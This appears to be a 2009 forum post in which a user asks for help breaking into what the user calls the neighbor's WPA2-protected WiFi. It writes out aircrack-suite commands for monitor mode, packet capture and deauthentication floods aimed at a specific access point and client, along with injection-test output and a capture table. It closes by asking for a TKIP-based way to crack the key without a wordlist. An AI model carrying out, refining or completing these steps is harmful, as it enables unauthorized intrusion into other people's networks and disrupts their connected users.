I'm trying to crack a WPA2-protected WiFi. I've read lots of "manuals" and explanations on the subject, but I'm not very good at using Linux (right now I'm running my Intrepid Ubuntu =) )
I've run into some problems... I'll try to explain as best I can, but if something is difficult to understand please post and I'll try to answer the questions.
OK. This is what I've done (wlan0 is my WiFi iface).
Is this the same thing as using airmon-ng? I've read the man page of airmon-ng but it only says that you can use this script to bring the wireless device (wlan0) into monitor mode.
$ sudo su
# ifconfig wlan0 down
# iwconfig wlan0 mode monitor
# ifconfig wlan0 up
OK, now airodump is listening on wlan0.
airodump-ng -w fra --channel 11 wlan0 (11 is the channel of the AP...seen before using airodump-ng)
In the airodump window nothing happened! I still tried to do it but, from what I can see, the injection fails.
$ sudo aireplay-ng --deauth 1 -a 00:13:c8:cc:22:** -c 00:17:c4:76:30:** wlan0
17:35:37 Sending DeAuth to station -- STMAC: [00:17:C4:76:30:**]
What does it mean? Maybe the client is too far away? Looking at airodump I can see its MAC but sometimes there are lost packets.
$ sudo aireplay-ng --test wlan0
18:04:01 Trying broadcast probe requests...
18:04:02 No Answer...
18:04:02 Found 1 AP
18:04:02 Trying directed probe requests...
18:04:02 00:13:C8:CC:22:B3 - channel: 11 - 'Broadcom'
18:04:11 0/30: 0%
I can't understand why the injection fails and I don't see the WPA handshake. I've tried to send 10 consecutive deauthentication packets but nothing! >.<
Maybe the neighbor's WiFi is uncrackable? It's WPA2..
Waiting for a response =)
PS: here is a report of what I can see on the airodump-ng page:
CH 11 ][ Elapsed: 4 hours 25 mins ][ 2009-12-27 21:48

BSSID              PWR  RXQ  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID
00:13:C8:CC:22:B3   -1   83   126192     690   3  11  48   WPA2  CCMP    PSK   Broadcom
00:0C:F6:50:D2:17   -1    0     1225       0   0  11  54.  WPA2                Sitecom50D217

BSSID              STATION            PWR  Lost  Packets  Probes
00:13:C8:CC:22:B3  00:17:C4:76:30:9C   -1  1676    10923  Broadcom
Does anyone know how to crack the WPA2 PSK using the TKIP bug? I've read something about a way to crack the TKIP protocol without using a wordlist... Can anyone help me?